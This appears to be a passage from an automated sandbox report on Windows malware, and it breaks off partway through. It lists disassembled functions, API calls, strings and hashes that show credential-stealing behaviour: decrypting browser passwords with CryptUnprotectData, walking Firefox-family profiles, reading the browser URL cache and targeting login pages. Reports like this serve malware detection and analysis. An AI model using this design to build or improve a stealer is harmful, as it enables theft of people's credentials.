                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                          • String ID: $/deleteregkey$/savelangfile
                          • API String ID: 1442760552-28296030
                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                          Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                          • wcsrchr.MSVCRT ref: 0040B738
                          • memset.MSVCRT ref: 0040B756
                          • memset.MSVCRT ref: 0040B7F5
                          • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                          • CloseHandle.KERNEL32(00000000), ref: 0040B838
                          • memset.MSVCRT ref: 0040B851
                          • memset.MSVCRT ref: 0040B8CA
                          • memcmp.MSVCRT ref: 0040B9BF
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • memset.MSVCRT ref: 0040BB53
                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                          • String ID: chp$v10
                          • API String ID: 229402216-2783969131
                          • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                          • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                          APIs
                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                          • memset.MSVCRT ref: 00413D7F
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                          • memset.MSVCRT ref: 00413E07
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                          • CloseHandle.KERNEL32(?), ref: 00413EA8
                          • free.MSVCRT ref: 00413EC1
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                          • API String ID: 3957639419-1740548384
                          • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                          • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                            • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                          • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                          • CloseHandle.KERNEL32(?), ref: 0040E13E
                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                          • CloseHandle.KERNEL32(?), ref: 0040E148
                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                          • String ID: bhv
                          • API String ID: 4234240956-2689659898
                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                          • __set_app_type.MSVCRT ref: 00446762
                          • __p__fmode.MSVCRT ref: 00446777
                          • __p__commode.MSVCRT ref: 00446785
                          • __setusermatherr.MSVCRT ref: 004467B1
                          • _initterm.MSVCRT ref: 004467C7
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                          • _initterm.MSVCRT ref: 004467FD
                          • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                          • exit.MSVCRT ref: 00446897
                          • _cexit.MSVCRT ref: 0044689D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID:
                          • API String ID: 2791496988-0
                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040C298
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                          • wcschr.MSVCRT ref: 0040C324
                          • wcschr.MSVCRT ref: 0040C344
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                          • GetLastError.KERNEL32 ref: 0040C373
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                          • String ID: visited:
                          • API String ID: 2470578098-1702587658
                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                          • memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • free.MSVCRT ref: 0040E28B
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                          • _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                          • API String ID: 2804212203-2982631422
                          • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                          • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040BC75
                          • memset.MSVCRT ref: 0040BC8C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                          • memcmp.MSVCRT ref: 0040BCD6
                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                          • String ID:
                          • API String ID: 115830560-3916222277
                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                          • String ID: r!A
                          • API String ID: 2791114272-628097481
                          • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                          • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                          • wcslen.MSVCRT ref: 0040C82C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                          • API String ID: 2936932814-4196376884
                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                          • String ID: BIN
                          • API String ID: 1668488027-1015027815
                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                          Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00403CBF
                          • memset.MSVCRT ref: 00403CD4
                          • memset.MSVCRT ref: 00403CE9
                          • memset.MSVCRT ref: 00403CFE
                          • memset.MSVCRT ref: 00403D13
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403DDA
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Waterfox$Waterfox\Profiles
                          • API String ID: 4039892925-11920434
                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                          Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00403E50
                          • memset.MSVCRT ref: 00403E65
                          • memset.MSVCRT ref: 00403E7A
                          • memset.MSVCRT ref: 00403E8F
                          • memset.MSVCRT ref: 00403EA4
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403F6B
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                          • API String ID: 4039892925-2068335096
                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00403FE1
                          • memset.MSVCRT ref: 00403FF6
